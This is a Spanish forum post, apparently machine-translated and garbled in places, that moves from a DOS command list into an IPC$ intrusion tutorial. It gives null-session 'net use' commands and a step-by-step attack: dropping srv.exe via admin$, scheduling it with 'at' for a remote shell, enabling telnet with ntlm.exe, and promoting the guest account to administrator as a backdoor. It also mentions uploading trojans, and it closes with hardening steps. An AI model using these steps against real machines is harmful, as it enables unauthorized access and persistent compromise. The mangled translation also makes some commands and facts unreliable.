Quiero aprender algunos comandos de DOS. ¿Alguien puede decirme?
dir columna nombre de archivo deltree eliminar directorio árbol cls borrar pantalla cd cambiar directorio actual
copiar copiar archivo discocopiar copiar disco del eliminar formato de archivo formatear disco
editar texto editar mem Verificar el estado de la memoria md Crear subdirectorio mover Mover archivos y cambiar nombres de directorio
más Tipo de visualización de pantalla dividida Mostrar contenido del archivo rd Eliminar directorio sys Crear disco de sistema DOS
ren Cambiar nombre de archivos xcopy Copiar directorios y archivos chkdsk Comprobar atributos de disco Establecer atributos de archivo
fdisk Fecha de partición del disco duro Mostrar y modificar etiqueta de fecha Establecer etiqueta de volumen defrag Desfragmentación de disco
msd Ruta de detección del sistema Establecer búsqueda Archivo compartido de directorio *** compartir gestión de optimización de memoria de memmaker
ayuda ayuda a restaurar restaurar conjunto de archivos de copia de seguridad configurar entorno tiempo variable hora de visualización y modificación
lista de árboles directorio árbol depuración depurador aleatorio reinicio de doskey Llame al comando DOS adelantarse, configurar el mensaje de recuperación, recuperar archivos eliminados, escanear el disco, detectar y reparar el disco
Comandos de DOS poco utilizados
agregar comparación de discos diskcomp, establecer la ruta del archivo no ejecutable p>
expandir restaurar archivos DOS fasthelp mostrar rápidamente información de ayuda
comparación de archivos fc interink iniciar el servidor
setver configurar la versión intersvr iniciar el cliente
reemplazo de ruta subst qbasic Entorno integrado básico
vsafe antivirus sin formato restaurar disco formateado
ver muestra el número de versión de DOS smartdrv establece el acelerador de disco
vol muestra la etiqueta de volumen del disco programa de transferencia lh Cargar memoria de alta gama
ctty Cambiar dispositivo de control emm386 Gestión de memoria extendida
Introducción detallada de comandos comunes:
Dir muestra archivos de directorio y listas de subdirectorios, jaja. Por supuesto que todo el mundo necesita saber esto. Se pueden utilizar caracteres comodín (? y *), ? La tabla asigna comodines a un carácter y la tabla * asigna comodines a cualquier carácter.
*.suffix especifica el archivo cuyo sufijo se va a ver. De hecho, lo anterior también puede ser ". sufijo", por ejemplo, dir *.exe es igual a dir .exe
/p muestra una pantalla de lista cada vez. Para ver la siguiente pantalla, presione cualquier tecla del teclado.
/w Muestra la lista en formato ancho, mostrando hasta 5 nombres de archivos o directorios en cada línea.
/s Enumera cada aparición del nombre de archivo especificado en el directorio especificado y todos los subdirectorios. Mucho más rápido que buscar en el entorno win
dir *.* -> a.txt escribe la lista de archivos del directorio actual en a.txt
dir *.* /s -> a .txt Escribe la lista de archivos del directorio actual en un.txt, incluidos los archivos en los subdirectorios. 2. Attrib muestra, establece o elimina los atributos de solo lectura, de archivo, de sistema y ocultos asignados a archivos o directorios. Si se usa sin argumentos, attrib muestra los atributos de todos los archivos en el directorio actual.
+r establece el atributo de solo lectura.
-r borra el atributo de solo lectura.
+a Establecer propiedades del archivo comprimido.
-a Borrar atributos del archivo comprimido.
+s Establece las propiedades del sistema.
-s borra las propiedades del sistema.
+h establece atributos ocultos.
-h borra los atributos ocultos.
3. Cls borra toda la información que se muestra en la ventana del símbolo del sistema y regresa a una ventana vacía, es decir, "borra la pantalla". 4. Salir sale del intérprete de comandos actual y regresa al sistema. 5. formatear formato
/q realiza un formateo rápido. Elimine la tabla de archivos y el directorio raíz de un volumen previamente formateado, pero no escanee entre sectores en busca de áreas dañadas. El uso de la opción de línea de comando /q solo debe formatear volúmenes intactos que hayan sido formateados previamente. 6. Ipconfig muestra todos los valores de configuración de red TCP/IP actuales, actualiza la configuración del Protocolo de configuración dinámica de host (DHCP) y del Sistema de nombres de dominio (DNS). Utilice ipconfig sin parámetros para mostrar la dirección IP, la máscara de subred y la puerta de enlace predeterminada de todos los adaptadores.
/all Muestra información completa de configuración TCP/IP para todos los adaptadores.
ipconfig es equivalente a winipcfg, que está disponible en ME, 98 y 95. Aunque Windows XP no proporciona una interfaz gráfica como el comando winipcfg, puede utilizar Conexiones de red para ver y actualizar direcciones IP. Para hacer esto, abra Conexiones de red, haga clic derecho en una conexión de red, haga clic en Estado y luego haga clic en la pestaña Soporte. Este comando funciona mejor con computadoras que están configuradas para obtener una dirección IP automáticamente. Permite a los usuarios determinar qué valores de configuración TCP/IP están configurados por DHCP, direccionamiento IP privado automático (APIPA) y otras configuraciones. 7. md crea un directorio o subdirectorio. 8. Move mueve uno o más archivos de un directorio a un directorio específico. 9. NBTstat
Muestra estadísticas de NetBIOS, tabla de nombres NetBIOS y caché de nombres NetBIOS basada en el protocolo TCP/IP (NetBT) para computadoras locales y remotas. Nbtstat puede actualizar la caché de nombres NetBIOS y los nombres registrados del Servicio de nombres de Internet de Windows (WINS). Utilice nbtstat sin argumentos para mostrar ayuda. Los parámetros de la línea de comando de Nbtstat distinguen entre mayúsculas y minúsculas.
-un nombre remoto muestra la tabla de nombres NetBIOS de la computadora remota, donde NombreRemoto es el nombre de la computadora NetBIOS de la computadora remota.
-A Dirección IP Muestra una tabla de nombres NetBIOS para la computadora remota, cuyos nombres se especifican por la dirección IP de la computadora remota (separados por puntos decimales). 10. Netstat muestra conexiones TCP activas, puertos en los que la computadora está escuchando, estadísticas de Ethernet, tablas de enrutamiento IP, estadísticas de IPv4 (para protocolos IP, ICMP, TCP y UDP) y estadísticas de IPv6 (para IPv6, ICMPv6, a través de protocolos IPv6 TCP y UDP sobre IPv6). Cuando se usa sin argumentos, netstat muestra conexiones TCP activas.
-a Muestra todas las conexiones TCP activas y los puertos TCP y UDP en los que la computadora está escuchando. 11. Ping verifica una conexión a nivel de IP con otra computadora TCP/IP enviando un mensaje de solicitud de eco del Protocolo de control de mensajes de Internet (ICMP). La recepción de mensajes de respuesta se mostrará junto con el número de viajes de ida y vuelta. Ping es el comando TCP/IP principal que se utiliza para detectar problemas problemáticos con la conectividad de la red, la accesibilidad y la resolución de nombres. Sin argumentos, ping mostrará ayuda. La resolución de nombres y direcciones IP es su aplicación más sencilla y la más utilizada.
-t especifica que ping puede continuar enviando mensajes de solicitud de eco al destino antes de ser interrumpido. Para dividir y mostrar estadísticas, presione CTRL-BREAK. Para interrumpir y salir del ping, presione CTRL-C.
-lSize especifica la longitud, en bytes, del campo "datos" en el mensaje de solicitud de eco enviado. El valor predeterminado es 32. El valor máximo de tamaño es 65.527.
12. Cambiar nombre (Ren) Cambia el nombre del archivo. Por ejemplo, ren *.abc *.cba 13. Set muestra, establece o elimina variables de entorno. Sin ningún argumento, el comando set muestra la configuración del entorno actual. 14. Apagar le permite apagar o reiniciar la computadora local o remota. Si no se utilizan parámetros, el apagado cerrará la sesión del usuario actual.
-m ComputerName especifica la computadora que se apagará.
-t xx Establece el temporizador para el apagado del sistema en xx segundos. El valor predeterminado es 20 segundos.
-l cierra la sesión del usuario actual, esta es la configuración predeterminada. -m NombreEquipo tiene prioridad.
-s Apaga el ordenador local.
-r Reiniciar después del apagado.
-a Abortar el apagado. Se ignoran los parámetros distintos de -l y ComputerName. Durante el período de tiempo de espera, solo puedes usar -a. 15. Comprobador de archivos del sistema (sfc)
Solo disponible en win, escanea y verifica todos los archivos protegidos del sistema después de reiniciar la computadora.
/scannow escanea todos los archivos protegidos del sistema inmediatamente.
/sCanonce escanea todos los archivos protegidos del sistema a la vez.
/purgecache Purga inmediatamente la caché de archivos de Protección de archivos de Windows y analiza todos los archivos protegidos del sistema.
/cachesize=x Establece el tamaño de la caché de archivos de Protección de archivos de Windows, en MB. 16. tipo muestra el contenido del archivo de texto. Utilice el comando type para ver archivos de texto o archivos bat sin modificar los archivos. 17. Tree muestra gráficamente la ruta o estructura de directorios del disco en la unidad. 18. Xcopy copia archivos y directorios, incluidos los subdirectorios.
/s Copia directorios y subdirectorios que no están vacíos. Si se omite /s, xcopy funcionará en un directorio.
/e Copia todos los subdirectorios, incluidos los directorios vacíos. 19. copiar copia uno o más archivos de una ubicación a otra 20. del elimina el archivo especificado.
Dado que hay demasiados subcomandos para los comandos por lotes ftp y bat y net y telnet, no los discutiremos aquí, pero todos se usan comúnmente.
Explicación detallada del comando IPC$:
Hay innumerables artículos sobre la intrusión de ipc$ en Internet, y también hay algunos excelentes sobre los pasos del ataque. se han convertido en un modelo clásico, por lo que no hay gente dispuesta a sacar esto que se ha convertido en un estereotipo.
Pero dicho esto, personalmente creo que estos artículos no lo explican en detalle, porque. Para los recién llegados que están expuestos a ipc$ por primera vez, una simple lista de pasos no puede responder a muchas de sus confusiones (pueden buscar ipc en cualquier foro de piratería para ver cuántas dudas hay). Escribí este tutorial que es equivalente a resolver la confusión. Quiero aclarar algunos problemas que se confunden y confunden fácilmente, para que no todos permanezcan en el mismo lugar. Si aún tiene preguntas después de leer esta publicación, ¡responda de inmediato! /p>
2. ¿Qué es ipc$?
IPC$ (Internet Process ConNECtion) es el único recurso para compartir "canalizaciones con nombre" (eso es lo que todos dicen que es una canalización con nombre abierta). comunicación entre procesos y se puede verificar. El nombre de usuario y la contraseña obtienen los permisos correspondientes y se utilizan al administrar la computadora de forma remota y ver los recursos compartidos de la computadora. Usando IPC$, el conector puede incluso establecer una conexión vacía con el host de destino sin un nombre de usuario y contraseña (por supuesto, la otra máquina debe tener el privilegio ipc$*** activado; de lo contrario, no podrá conectarse). y usando esta conexión vacía A través de la conexión, el conector también puede obtener la lista de usuarios en el host de destino (pero el administrador responsable prohibirá la exportación de la lista de usuarios).
Siempre hablamos de la vulnerabilidad de ipc$. De hecho, ipc$ no es una vulnerabilidad real. Es una función de inicio de sesión remoto en la red que se abre para facilitar la administración remota de los administradores y también activa el uso compartido predeterminado. es decir, todos los discos lógicos (c$, d$, e$...) y directorios del sistema winnt o windows (admin$). La intención original de todo esto es facilitar la gestión de los administradores, pero las buenas intenciones originales no necesariamente tienen buenos resultados. Algunas personas con motivos ocultos (¿cuáles son sus intenciones? No lo sé, solo hay un pronombre) lo usarán. IPC$ para acceder * ** Comparta recursos, exporte la lista de usuarios y use algunas herramientas de diccionario para realizar la detección de contraseñas, con la esperanza de obtener permisos más altos, logrando así propósitos posteriores
Desambiguación:
1) La conexión IPC es una función única de inicio de sesión remoto en la red en sistemas Windows NT y superiores. Su función es equivalente a Telnet en Unix. Dado que la función IPC$ requiere el uso de muchas funciones DLL en Windows NT, no se puede utilizar. Windows 9 .x para ejecutar.
En otras palabras, solo nt/2000/xp puede establecer una conexión ipc$, y 98/me no puede establecer una conexión ipc$ (pero algunos amigos dicen que se puede establecer una conexión vacía bajo 98. No sé si es cierto o no, pero ahora estamos en 2003. Han pasado 10 años, sugiero a 98 camaradas que cambien el sistema, 98 no están contentos)
2) Ni siquiera una conexión vacía se puede establecer con éxito el 100% de las veces. Si la otra parte ha desactivado el uso compartido de ipc$***, aún no podrá establecer una conexión
3) Esto no significa que pueda ver la lista de usuarios de la otra parte después de establecer una conexión ipc$. , porque el administrador puede prohibir la exportación de la lista de usuarios
3. Establezca una conexión ipc$ La función de los ataques de pirateo es la mencionada anteriormente. Incluso si establece una conexión vacía, puede obtener mucha información. (y esta información suele ser necesaria para intrusiones), acceda a algunos recursos compartidos ***. Si puede iniciar sesión como usuario con ciertos permisos, obtendrá los permisos correspondientes. Obviamente, si inicia sesión como administrador, oye. ¡¡No es necesario que diga más, lo que quieras, lo puedes hacer!!
(Básicamente, se puede resumir en obtener información de destino, administrar procesos y servicios de destino, cargar troyanos y ejecutarlos. Si es así, 2000server, también puedes considerar activar los servicios de terminal para un fácil control. ¿Qué te parece? ¡Es bastante impresionante!)
Pero no te alegres demasiado pronto, porque la contraseña del administrador no es tan fácil de obtener. Aunque habrá algunos administradores tontos que usan contraseñas vacías o contraseñas débiles, después de todo, este no es el caso, y ya no lo es. Con la mejora de la conciencia de la gente sobre la seguridad, los administradores se han vuelto más cuidadosos. , y será cada vez más difícil obtener la contraseña de administrador:(
Así que en el futuro tendrás la mayor posibilidad. Simplemente conéctate con permisos mínimos o incluso sin permisos. Poco a poco encontrarás esa conexión ipc$ no es omnipotente. Incluso si el host no permite compartir ipc$***, no podrás conectarte en absoluto.
Así que creo que no deberías considerar la invasión de ipc$ como la definitiva. Arma, y no creas que es invencible. Es como un pase antes de disparar en el campo de fútbol. Rara vez tiene un efecto de golpe fatal, pero es indispensable. Creo que ese es el significado de la conexión ipc $. piratería.
La relación entre los cuatro ipc$ y las conexiones vacías, los puertos 139, 445 y el uso compartido predeterminado puede ser una pregunta muy confusa para los novatos, pero la mayoría de los artículos no brindan información especial. De hecho, no lo entiendo muy a fondo. Todos se resumen a través de la comunicación con todos (un BBS con un buen ambiente de discusión puede decir que es un paraíso para los novatos)
1) ipc$. y conexión vacía:
La conexión ipc$ que no requiere un nombre de usuario y contraseña es una conexión vacía una vez que inicia sesión como un determinado usuario o administrador Si inicia sesión como miembro (es decir, conectarse a ipc$ con un nombre de usuario y contraseña específicos), naturalmente no se puede llamar una conexión vacía.
Muchas personas pueden preguntar, ya que puedo tener una conexión vacía, entonces usaré una conexión vacía en. el futuro. Una vez establecida la conexión, ¿por qué molestarse en buscar contraseñas débiles? Jaja, el motivo se mencionó anteriormente. Cuando inicias sesión con una conexión vacía, no tienes ningún permiso (muy deprimente) y estás iniciado. inicie sesión como usuario o cuando inicie sesión como administrador, tendrá los permisos correspondientes (quién no quiere tener permisos, así que escanéelo honestamente y no sea perezoso
2) ipc). $ y 139,445 puertos:
La conexión ipc$ puede realizar inicio de sesión remoto y acceso a archivos compartidos predeterminados y la apertura del puerto 139 indica la aplicación del protocolo netbios, podemos realizar archivos compartidos a través del puerto 139, 445 ( win2000)/Acceso a la impresora, por lo que, en términos generales, la conexión ipc$ debe ser compatible con el puerto 139 o 445.
3) ipc$ y el uso compartido *** predeterminado El uso compartido *** predeterminado es para facilitar el administrador a la administración remota y el uso compartido habilitado de forma predeterminada (por supuesto, puede desactivarlo), es decir, todos los discos lógicos (c$, d$, e$...) y los directorios del sistema winnt o windows (admin$), nos conectamos a través de ipc$ Se puede lograr el acceso a estos recursos compartidos predeterminados (siempre que la otra parte no haya cerrado estos recursos compartidos predeterminados)
Cinco razones para la falla de conexión de ipc$ Las siguientes 5 razones son relativamente comunes:
1) Su sistema no es N
T o superior al sistema operativo
2) La otra parte no abre ipc$default *** Sharing
3) La otra parte no abre el puerto 139 o 445 (es bloqueado por el firewall) )
4) La entrada de su comando es incorrecta (como faltan espacios, etc.)
5) El nombre de usuario o la contraseña son incorrectos (por supuesto que no). No importa si la conexión está vacía)
Además, también puedes analizar el motivo en función del número de error devuelto: Error número 5, acceso denegado: Es muy probable que el usuario que estás utilizando no tenga privilegios de administrador primero; Error número 51, Windows no puede encontrar la ruta de red: Hay un problema con la red; Error número 53, no se puede encontrar la ruta de red: La dirección IP es incorrecta; encendido; el servicio lanmanserver de destino no se inicia; el destino tiene un firewall (filtrado de puerto número 67, no se puede encontrar el nombre de la red: el servicio lanmanworkstation no se inicia; el ipc$ de destino se eliminó; proporcionó conflicto con el conjunto de credenciales existente: ha establecido un ipc$ con la otra parte, elimínelo y vuelva a intentarlo. Número de error 1326, nombre de usuario desconocido o contraseña incorrecta: el motivo es obvio. Error número 1792, al intentar iniciar sesión, pero el servicio de inicio de sesión de red no se inició: el servicio NetLogon de destino no se inició. (Esto sucederá cuando se conecte a un controlador de dominio) Número de error 2242, la contraseña de este usuario ha caducado: el objetivo tiene una política de cuenta que obliga a que se requieran cambios de contraseña periódicamente.
El problema de que ipc$ no pueda conectarse es relativamente complicado. Además de las razones anteriores, también habrá otros factores inciertos que no daré una explicación detallada y definitiva. todos experimentan y experimentan por sí mismos.
Seis cómo abrir el IPC$ del objetivo (este párrafo es una cita de un artículo relacionado) En primer lugar, debe obtener un shell que no dependa. en ipc$, como la extensión cmd de sql, telnet, Trojan, por supuesto, este shell debe tener permisos de administrador y luego puede usar el shell para ejecutar el comando net share ipc$ para abrir el ipc$ del objetivo. De lo anterior, podemos saber que existen muchas condiciones para que se utilice ipc$. Confirme que los servicios relevantes se estén ejecutando. De lo contrario, inícielo (si no sabe cómo hacerlo, consulte el uso del comando net). Si aún no funciona (por ejemplo, hay un). firewall y no se puede eliminar), se recomienda darse por vencido.
Siete cómo prevenir la intrusión de ipc$
1. Prohibir conexiones vacías para la enumeración (esta operación no impide el establecimiento de conexiones vacías, citado de "Anatomía de conexiones vacías en win2000" Session》)
Primero ejecute regedit, busque el siguiente componente [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] y cambie el valor clave de RestrictAnonymous = DWORD a: 00000001 (si se establece en 2, habrá se producen algunos problemas, como algunos problemas del servicio WIN, etc.)
2 Deshabilitar el uso compartido predeterminado ***
1) Verifique los recursos compartidos locales y ejecute -cmd-enter net share
2) Eliminar *** recursos compartidos (ingrese uno a la vez)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (si hay e, f,... puedes continuar eliminando)
3) Detener el servicio del servidor
net stop server /y (el servicio del servidor se reiniciará después de reiniciar)
4) Modifique el registro y ejecute -regedit
Versión del servidor : Busque la siguiente clave principal [HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\LanmanServer\Parameters] Cambie el valor de la clave de AutoShareServer (DWORD) a: 00000000.
Versión Pro: busque la siguiente clave principal [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] y cambie el valor de la clave de AutoShareWks (DWORD) a: 00000000. Si la clave principal mencionada anteriormente no existe, cree una nueva clave principal (haga clic derecho en Nuevo valor de doble byte) y luego cambie el valor de la clave.
3 Cierre permanentemente ipc$ y los servicios dependientes compartidos predeterminados ***: lanmanserver es el panel de control del servicio del servidor - herramientas de administración - servicios - busque el servicio del servidor (clic derecho) - propiedades - general - tipo de inicio - tiene Desactivar
4 Instale un firewall (seleccione la configuración relevante) o un filtro de puerto (filtre 139, 445, etc.) o use una nueva versión del maestro de optimización
5 Establezca una contraseña compleja para evitar ipc$ Contraseña exhaustiva
Ocho comandos relacionados
1) Establezca una conexión vacía:
net use \\IP\ipc$ "" /usuario:"" (debe Tenga en cuenta: esta línea de comando contiene 3 espacios)
2) Establezca una conexión no vacía:
net use \\IP\ipc $ "Nombre de usuario" /usuario:" Contraseña" (también tiene 3 espacios)
3) Mapeo predeterminado *** share:
net use z: \\IP\c$ " Contraseña" /usuario:"Nombre de usuario" (puede asignar la unidad c de la otra parte a su propia unidad z, y así sucesivamente para otras unidades)
Si se ha establecido ipc$ con el objetivo, puede use directamente IP+letra de unidad+$ para acceder, comando específico net use z: \\IP\c$
4) Eliminar una conexión ipc$
net&nbs
p;use \\IP\ipc$ /del
5) Eliminar *** asignación compartida
net use c: /del elimina la unidad c asignada, y así sucesivamente para otras unidades
uso de red * /del elimina todo, aparecerá un mensaje pidiendo que presione y para confirmar
Nueve modos de intrusión clásicos. Este modo de intrusión es tan clásico que la mayoría de los tutoriales de IPC. Lo presenté, así que lo cité. ¡Me gustaría agradecer al autor original (no sé quién es)
11. IPC$ "contraseña" /usuario:"nombre de usuario"
Generalmente use streamer, obtenga la cuenta de administrador y la contraseña escaneando contraseñas débiles
2. \\127.0.0.1\admin$
Copie srv exe primero, está disponible en el directorio de Herramientas del transmisor ($ aquí se refiere al c:\winnt\system32\ del usuario administrador. También puede hacerlo use c$, d$, que significa unidad C y unidad D (depende de lo que desee copiar en algún lugar).
3. C:\>net time \\127.0.0.1
Verifique la hora y descubra que la hora actual de 127.0.0.1 es 2004/6/15 11:00 am. , comando completado con éxito.
4. C:\>at \\127.0.0.1 11:05 srv.exe
Utilice el comando at para iniciar srv.exe
5. C :\>hora neta \\127.0.0.1
¿Has vuelto a comprobar la hora? Si la hora actual de 127.0.0.1 es 2004/6/15 11:05 a. m., prepárese para iniciar el siguiente comando.
6. C:\>telnet 127.0.0.1 99
Aquí se utilizará el comando Telnet. Tenga en cuenta que el puerto es 99. El puerto Telnet predeterminado es 23, pero usamos SRV para crear un Shell de 99 puertos en la computadora de la otra parte.
Aunque podemos acceder a través de Telnet, SRV es de un solo uso y debe activarse nuevamente la próxima vez que iniciemos sesión. ¡Así que vamos a construir un servicio Telnet! Esto requiere el uso de ntlm
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
Use el comando Copiar para cargar ntlm.exe al host (ntlm.exe también se encuentra en el directorio de Herramientas de "Streamer").
8. C:\WINNT\system32>ntlm Ingrese ntlm para iniciar (C:\WINNT\system32> aquí se refiere a la computadora de la otra parte. La ejecución de ntlm en realidad permite que el programa se ejecute en la computadora de la otra parte. ). Cuando aparece "DONE", significa que ha comenzado normalmente. Luego utilice "net start telnet" para iniciar el servicio Telnet.
9. Telnet 127.0.0.1, luego ingrese el nombre de usuario y la contraseña para ingresar a la otra parte. ¡La operación es tan simple como operar en DOS! (Entonces, ¿qué quieres hacer? Simplemente haz lo que quieras, jaja)
Por si acaso, agregaremos la activación de invitados al grupo de administración
10. net user guest /active:yes
Activar el usuario invitado de la otra parte
11.\>net user guest 1234
Establecer la contraseña de invitado Cambiar a. 1234, o la contraseña que desea establecer
12. C:\>net locaLGroup administradores invitado /add
Cambiar Invitado a Administrador (si se cambia la contraseña del administrador, invitado Si el la cuenta no ha cambiado, podemos usar invitado para acceder a esta computadora nuevamente la próxima vez)
Preguntas frecuentes sobre ipc$:
1. ¿Cómo establecer una conexión vacía y para qué sirve? Respuesta: Utilice el comando net use \IPipc$ "" /user:"" para simplemente establecer una conexión vacía con el objetivo (el objetivo necesita abrir ipc$).
Para NT, bajo la configuración de seguridad predeterminada, con la ayuda de conexiones vacías, puede enumerar los usuarios y recursos compartidos de destino, acceder a los recursos compartidos con el permiso de todos, acceder a una pequeña parte del registro, etc., lo cual tiene poco valor de uso. El efecto en el año 2000 es aún menor. Además, no es cómodo de implementar y requiere la ayuda de herramientas.
2. ¿Por qué no puedo conectarme a IPC$? Respuesta: 1. Sólo los sistemas nt/2000/xp y superiores pueden crear ipc$. Si está utilizando 98/me, esta función no está disponible.
2. Asegúrate de que tu comando sea correcto. El comando correcto es: net use \targetIPipc$ "contraseña" /usuario:"nombre de usuario" Tenga cuidado de no incluir demasiados o muy pocos espacios. Las comillas dobles en ambos lados se pueden omitir cuando el nombre de usuario y la contraseña no contienen espacios. Las contraseñas vacías están representadas por "".
3. Analice el motivo según el número de error devuelto: Error número 5, acceso denegado: Es muy probable que el usuario que está utilizando no tenga privilegios de administrador primero. , Windows no puede encontrar la ruta de la red: hay un problema con la red; Error número 53, no se puede encontrar la ruta de la red: la dirección IP es incorrecta; el destino no está encendido; el servicio lanmanserver de destino no está iniciado; tiene un firewall (filtrado de puerto número 67, no se puede encontrar el nombre de la red: su servicio lanmanworkstation no se inició; el destino se eliminó ipc$; error número 1219, las credenciales proporcionadas entran en conflicto con el conjunto de credenciales existente: ha establecido un ipc$); con la otra parte, elimínelo y vuelva a intentarlo. Número de error 1326, nombre de usuario desconocido o contraseña incorrecta: el motivo es obvio. Error número 1792, al intentar iniciar sesión, pero el servicio de inicio de sesión de red no se inició: el servicio NetLogon de destino no se inició. (Esto sucederá cuando se conecte a un controlador de dominio) Número de error 2242, la contraseña de este usuario ha caducado: el objetivo tiene una política de cuenta que obliga a que se requieran cambios de contraseña periódicamente.
4. El problema de la falla de conexión de ipc$ es relativamente complicado y no existe una comprensión unificada. Los experimentos con pollos de engorde a veces conducen a conclusiones contradictorias, lo cual es muy difícil. Y conociendo el problema, muchos problemas todavía no se pueden solucionar si no hay otra forma de obtener el shell.
5. ¿Cómo abrir el IPC$ del objetivo? Respuesta: Primero necesita obtener un shell que no dependa de ipc$, como la extensión sql cmd, telnet y Trojan. Por supuesto, este shell debe tener permisos de administrador. Luego puede usar el shell para ejecutar el comando net share ipc$ para abrir el ipc$ del objetivo. Como puede ver en la pregunta anterior, existen muchas condiciones para determinar si se puede utilizar ipc$. Confirme que los servicios relevantes se estén ejecutando; de lo contrario, inícielos (si no sabe cómo hacerlo, consulte el uso del comando net). Si aún no funciona (por ejemplo, hay un firewall y no se puede eliminar), se recomienda darse por vencido.
6. ¿Cómo mapear y acceder a recursos compartidos predeterminados? Respuesta: Utilice el comando net use z: \target IPc$ "contraseña" /usuario:"nombre de usuario" para asignar la unidad c de la otra parte a su propia unidad z, y así sucesivamente para otras unidades. Si se ha establecido ipc$ con el destino, puede acceder directamente a él usando IP más la letra de unidad más $. Por ejemplo, copie muma.exe \IPd$pathmuma.exe. O puede reasignar, pero no necesita el nombre de usuario y la contraseña: net use y: \IPd$. Luego copie muma.exe y:pathmuma.exe. Cuando la ruta contiene espacios, la ruta completa debe ir entre comillas con "".
7. ¿Cómo eliminar el mapeo y la conexión ipc$? Respuesta: Utilice el comando net use \IPipc$ /del para eliminar la conexión ipc$ con un destino. Utilice el comando net use z: /
del para eliminar el disco z asignado, y así sucesivamente para otros discos.
Utilice el comando net use * /del para eliminar todo. Aparecerá un mensaje que le pedirá que presione y para confirmar.
8. ¿Qué puedo hacer después de conectarme a ipc$?
Respuesta: Si puede conectarse exitosamente a ipc$ con una cuenta con derechos de administrador, significa que puede tener una "comunicación" profunda con el sistema de la otra parte. Puede utilizar varias herramientas de línea de comandos (como la serie pstools, Win2000SrvReskit, telnethack, etc.) para obtener información de destino, administrar procesos y servicios de destino, etc. Si el objetivo ha abierto el recurso compartido *** predeterminado (si no está abierto, puedes abrirlo por él), puedes cargar el troyano y ejecutarlo. También puedes subir usando tftp o ftp. Herramientas (troyanos) como dwrcc, VNC y RemoteAdmin también tienen la función de control directo de la pantalla. Si es el servidor 2000, también puede considerar activar los servicios de terminal para facilitar el control. Para el uso de las herramientas mencionadas aquí, consulte las instrucciones incluidas o los tutoriales relacionados.
9. ¿Cómo evitar que otros me invadan usando ips$ y default ***? Respuesta: R. Una forma es eliminar tanto ipc$ como el recurso compartido *** predeterminado. Pero seguirá sucediendo después de reiniciar. Esto requiere cambiar el registro.
1, elimine primero el existente
net share ipc$ /del
net share admin$ /del
net share c $ /del…………(Elimine algunos de ellos)
2. Para prohibir a otros conexiones vacías, primero ejecute regedit, busque la siguiente clave principal [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA] y cambie el valor de la clave de RestrictAnonymous ( DWORD) a: 00000002. 3. Deshabilite la apertura automática del recurso compartido *** predeterminado. Para la versión del servidor, busque la siguiente clave principal [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters] y cambie el valor de la clave de AutoShareServer (DWORD) a: 00000000.
Para la versión pro, [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters] cambia el valor clave de AutoShareWks (DWORD) a: 00000000. Si la clave principal mencionada anteriormente no existe, cree una nueva y cambie el valor de la clave.
B. Otra opción es cerrar ipc$ y los servicios dependientes compartidos predeterminados (no recomendado).
net stop lanmanserver puede indicar que el servicio XXX también se cerrará si desea continuar. . Porque hay algunos servicios secundarios que dependen de lanmanserver. Generalmente, simplemente presione y para continuar.
C. La forma más sencilla es establecer una contraseña compleja para evitar que se agote a través de ipc$. Pero si tiene otras vulnerabilidades, ipc$ facilitará más intrusiones.
D.Otra forma es instalar un firewall o filtrado de puertos.